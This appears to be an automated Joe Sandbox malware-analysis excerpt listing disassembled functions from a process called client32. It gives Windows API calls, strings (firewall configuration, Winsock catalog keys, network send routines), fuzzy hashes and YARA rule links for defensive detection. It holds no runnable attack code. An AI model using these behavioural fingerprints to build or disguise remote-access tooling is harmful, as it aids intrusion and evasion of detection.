Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: QueryValue_memsetwsprintf
String ID: %012d$NSLSP$PackedCatalogItem$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries
API String ID: 1333399081-1346142259
Opcode ID: 13c1aca20664a4fc0e133d793f1d669f9232a02ffdca666f732179c289691334
Instruction ID: 40dd4717f0c7ad5754e433c7b85868c8d74bcde588045e86a78ebe46af68b9ce
Opcode Fuzzy Hash: 13c1aca20664a4fc0e133d793f1d669f9232a02ffdca666f732179c289691334
Instruction Fuzzy Hash: 01418F75D022299EEB11DF50CC94BEEF7B4EB45318F0445E8E91AA7281EB34AB44CF51

Function 110618D9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

_fgets.LIBCMT ref: 110615D5
_strpbrk.LIBCMT ref: 110615FB
GetTickCount.KERNEL32 ref: 11061908
CheckLicenseString.PCICHEK(00000000,00000000), ref: 1106191B
wsprintfA.USER32 ref: 1106193F

Strings

_License, xrefs: 110618F6

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CheckCountLicenseStringTick_fgets_strpbrkwsprintf
String ID: _License
API String ID: 2925274595-3969723640
Opcode ID: 57eb07912173b09d2d6a718f612a6a8b2fea9b3332f7ae0c9a2918cf08a18aab
Instruction ID: 96a77fb98c0223eb2b4e36b27f4c2e587a44f0df050ee6f7a48cce7550f15376
Opcode Fuzzy Hash: 57eb07912173b09d2d6a718f612a6a8b2fea9b3332f7ae0c9a2918cf08a18aab
Instruction Fuzzy Hash: 7341E275C0465A9FDB11CF648C40BEABBFDAF49349F0481D5E889E3241E732AA46CF60

Function 1100FF90 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 1100FFBD
std::_Lockit::_Lockit.LIBCPMT ref: 1100FFE0
std::bad_exception::bad_exception.LIBCMT ref: 11010064
__CxxThrowException@8.LIBCMT ref: 11010072
std::_Lockit::_Lockit.LIBCPMT ref: 11010085
std::locale::facet::_Facet_Register.LIBCPMT ref: 1101009F

Strings

bad cast, xrefs: 1101005C

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: bad cast
API String ID: 2427920155-3145022300
Opcode ID: b91949114c5cc0d56ba0394389beafb177cfa03f8955ddf8c17424d389eecb5f
Instruction ID: eb2297de3126562b7a6adfe99aab1db74979c6a8f9cac3cb144437a799ef2362
Opcode Fuzzy Hash: b91949114c5cc0d56ba0394389beafb177cfa03f8955ddf8c17424d389eecb5f
Instruction Fuzzy Hash: B631E635E002658FCB52CF94C880BAEF7B4FB0536CF404269E865AB298DB75AD00CB91

Function 11141240 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 146COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 111412AD
SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,?), ref: 111412EE
SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1114134B

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

..\ctl32\util.cpp, xrefs: 11141267, 11141309
nsmdir < GP_MAX, xrefs: 1114126C
FALSE || !"wrong nsmdir", xrefs: 1114130E

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FolderPath$ErrorExitFileLastMessageModuleNameProcesswsprintf
String ID: ..\ctl32\util.cpp$FALSE || !"wrong nsmdir"$nsmdir < GP_MAX
API String ID: 3494822531-1878648853
Opcode ID: 1d2eb1ac8d69a6f74e2d2292f6299ccec90df6a61e137f66e811ad89e50a1c5c
Instruction ID: 9db0ad8c4734361e4183e08fa1cc534476f5972450c8a9aa7511e5a375f2920b
Opcode Fuzzy Hash: 1d2eb1ac8d69a6f74e2d2292f6299ccec90df6a61e137f66e811ad89e50a1c5c
Instruction Fuzzy Hash: 42515975E0422E5BDB12CF248C54BDDF7A4AB05B18F2441E4EC89B7681EB717A84CB92

Function 68C72F80 Relevance: 10.6, APIs: 7, Instructions: 115COMMON

Download Yara Rule

APIs

_calloc.LIBCMT ref: 68C72FBB
GetTickCount.KERNEL32 ref: 68C7300D
InterlockedExchange.KERNEL32(-00039761,00000000), ref: 68C7301B
_calloc.LIBCMT ref: 68C7303B
_memmove.LIBCMT ref: 68C73049
InterlockedDecrement.KERNEL32(-000397B9), ref: 68C7307F
SetEvent.KERNEL32(00000300,?,?,?,?,?,?,?,?,?,?,?,?,?,?,973534B3), ref: 68C7308C

Part of subcall function 68C728D0: wsprintfA.USER32 ref: 68C72965

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: Interlocked_calloc$CountDecrementEventExchangeTick_memmovewsprintf
String ID:
API String ID: 3178096747-0
Opcode ID: 3d485ab459ae1b15490d925c5cd556309d0d9723328a1908be97b81dcbb971aa
Instruction ID: c6bb5b3f28e60d76eaceccb2ab3ad81ee65dc60a9d51a265cf208ffd21df3893
Opcode Fuzzy Hash: 3d485ab459ae1b15490d925c5cd556309d0d9723328a1908be97b81dcbb971aa
Instruction Fuzzy Hash: EC4144B6D40209AFDB10CFB9D884AEFBBB8EB48314F40852AE515E7240F7759645CBA1

Function 111042A0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 110libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 1110C520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,7765C3F0,?,1110D1BD,00000000,00000001,?,?,?,000000FF,?,11026F57), ref: 1110C53E

Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477

LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11186026,000000FF), ref: 11104373
LoadLibraryA.KERNEL32(Advapi32.dll), ref: 111043C2
std::exception::exception.LIBCMT ref: 11104424
__CxxThrowException@8.LIBCMT ref: 11104439

Strings

Wtsapi32.dll, xrefs: 1110436E
Advapi32.dll, xrefs: 11104375

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LibraryLoad$CreateEventException@8Throw_memsetstd::exception::exceptionwsprintf
String ID: Advapi32.dll$Wtsapi32.dll
API String ID: 1187064156-2390547818
Opcode ID: eb8ffa7d751a0fb838dc8276ecb5f60825835a81c539c39725b34b54d8106a16
Instruction ID: bbbd634f828a37cff571ede067cab351b0e944a9bc0c67eb03fa8c0f48524c6c
Opcode Fuzzy Hash: eb8ffa7d751a0fb838dc8276ecb5f60825835a81c539c39725b34b54d8106a16
Instruction Fuzzy Hash: 594114B5D09B449AC361CF6A8980BDAFBF8EFA9204F00494ED5AE93210D7787500CF51

Function 11135BC0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 68COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 11135BEA
GetTickCount.KERNEL32 ref: 11135BF1

Strings

Client, xrefs: 11135C15
AutoICFConfig, xrefs: 11135C10
DoICFConfig() OK, xrefs: 11135C96
DesktopTimerProc - Further ICF config checking will not be performed, xrefs: 11135CAC

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountTick
String ID: AutoICFConfig$Client$DesktopTimerProc - Further ICF config checking will not be performed$DoICFConfig() OK
API String ID: 536389180-1512301160
Opcode ID: 82e572b6dc09f05acfa617eafdea0c45115b8c530f6da73777df33be47396042
Instruction ID: e3d06188695ac204c7c53c5cb05177b21b7d5d04c4fed9e193d22ae282c8029d
Opcode Fuzzy Hash: 82e572b6dc09f05acfa617eafdea0c45115b8c530f6da73777df33be47396042
Instruction Fuzzy Hash: D021E770A213A64EFF938AE5DD84765FE895780FAEF004139D420956CCE7749480DF56

Function 68C69C49 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 66sleeptimenetworkCOMMON

Download Yara Rule

APIs

send.WSOCK32(?,?,?,00000000), ref: 68C69C93
timeGetTime.WINMM(?,?,?,00000000), ref: 68C69CD0
Sleep.KERNEL32(00000000), ref: 68C69CDE
LeaveCriticalSection.KERNEL32(?), ref: 68C69D4F
InterlockedIncrement.KERNEL32(?), ref: 68C69D72

Strings

3', xrefs: 68C69CB2

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: CriticalIncrementInterlockedLeaveSectionSleepTimesendtime
String ID: 3'
API String ID: 77915721-280543908
Opcode ID: 28b0bb97c5a79e8daea770d0b7f980c313cd6994058e47018215a6df1c20edf8
Instruction ID: 846b21ad48c3d28aa5c1feef294aed1661a22fec04c7a0d72a32a1b47b815e24
Opcode Fuzzy Hash: 28b0bb97c5a79e8daea770d0b7f980c313cd6994058e47018215a6df1c20edf8
Instruction Fuzzy Hash: 00214F75A041189FDB20DF64CC98BAAB7B4AF05324F4142A5D91D9B241E734DD89CB91

Function 110259E0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,GetProcessImageFileNameA), ref: 110259F6
K32GetProcessImageFileNameA.KERNEL32(?,?,?), ref: 11025A12
GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11025A26
SetLastError.KERNEL32(00000078), ref: 11025A49

Strings

GetModuleFileNameExA, xrefs: 11025A20
GetProcessImageFileNameA, xrefs: 110259F0

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorFileImageLastNameProcess
String ID: GetModuleFileNameExA$GetProcessImageFileNameA
API String ID: 4186647306-532032230
Opcode ID: 574c1049adaa66244907c1f724b524b0e4bf3f673811b9f0067a0ab7346ebc51
Instruction ID: 68c8d787ea85bb7251c32f91647a1931aca61929af41b034d7bc2fd00ab8f334
Opcode Fuzzy Hash: 574c1049adaa66244907c1f724b524b0e4bf3f673811b9f0067a0ab7346ebc51
Instruction Fuzzy Hash: 46018036A41315AFD321DF69EC84F8BB7E8EB89765F10452AF986D7600D631E800CBB4

Function 1110C2B0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 52synchronizationthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,7765C3F0,00000000,?,1110D1D5,Function_0010CD70,00000001,00000000,?,?,?,000000FF), ref: 1110C2C7
CreateThread.KERNEL32(00000000,1110D1D5,00000001,00000000,00000000,0000000C), ref: 1110C2EA
WaitForSingleObject.KERNEL32(?,000000FF,?,1110D1D5,Function_0010CD70,00000001,00000000,?,?,?,000000FF,?,11026F57), ref: 1110C317
CloseHandle.KERNEL32(?,?,1110D1D5,Function_0010CD70,00000001,00000000,?,?,?,000000FF,?,11026F57), ref: 1110C321

Strings

hThread, xrefs: 1110C300
..\ctl32\Refcount.cpp, xrefs: 1110C2FB

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Create$CloseEventHandleObjectSingleThreadWait
String ID: ..\ctl32\Refcount.cpp$hThread
API String ID: 3360349984-1136101629
Opcode ID: c3790b5b1b7a227f0163c935fda81ea00c8c7f3da45704e0867b963cb20d20f9
Instruction ID: a3115959ccdc6595f724f67194249590caf2e9fcdd86f69c2c7dc21ad5a21c7d
Opcode Fuzzy Hash: c3790b5b1b7a227f0163c935fda81ea00c8c7f3da45704e0867b963cb20d20f9
Instruction Fuzzy Hash: 2D01D4367403126FE7208E99DC89F4BBBA8EB54765F108128FA15876C0DA70E404CBA0

Function 110313B0 Relevance: 9.0, APIs: 1, Strings: 5, Instructions: 28COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 110313F7

Strings

_SW, xrefs: 110313CC
226546, xrefs: 110313DE
_HF, xrefs: 110313D8, 110313DD
_HW, xrefs: 110313C0
%s%s%s.bin, xrefs: 110313F1

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf
String ID: %s%s%s.bin$226546$_HF$_HW$_SW
API String ID: 2111968516-1464289686
Opcode ID: 6ee20e8f6fb76372610271b0b8adebac1fa156d7fec8b42d91c02657696d9c88
Instruction ID: fca8ef28a5c1b47a0d785ddae3209236aee7f502678e08843e7b704547fe2850
Opcode Fuzzy Hash: 6ee20e8f6fb76372610271b0b8adebac1fa156d7fec8b42d91c02657696d9c88
Instruction Fuzzy Hash: D5E09BA0D2060C5FF3005159AC01BAFBBAC1F4434AF80C0D0FEE9A6A82E974944086D5

Function 68C76940 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 166COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 68C76950

Part of subcall function 68C77BE0: _memset.LIBCMT ref: 68C77BFF
Part of subcall function 68C77BE0: _strncpy.LIBCMT ref: 68C77C0B

Part of subcall function 68C6A4E0: EnterCriticalSection.KERNEL32(68CAB898,00000000,?,?,?,68C6DA7F,?,00000000), ref: 68C6A503
Part of subcall function 68C6A4E0: InterlockedExchange.KERNEL32(?,00000000), ref: 68C6A568
Part of subcall function 68C6A4E0: Sleep.KERNEL32(00000000,?,68C6DA7F,?,00000000), ref: 68C6A581
Part of subcall function 68C6A4E0: LeaveCriticalSection.KERNEL32(68CAB898,00000000), ref: 68C6A5B3

Strings

Publish %d pending services, xrefs: 68C76AAF
1.2, xrefs: 68C76998
Channel, xrefs: 68C76ADD
Client, xrefs: 68C76AE2

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
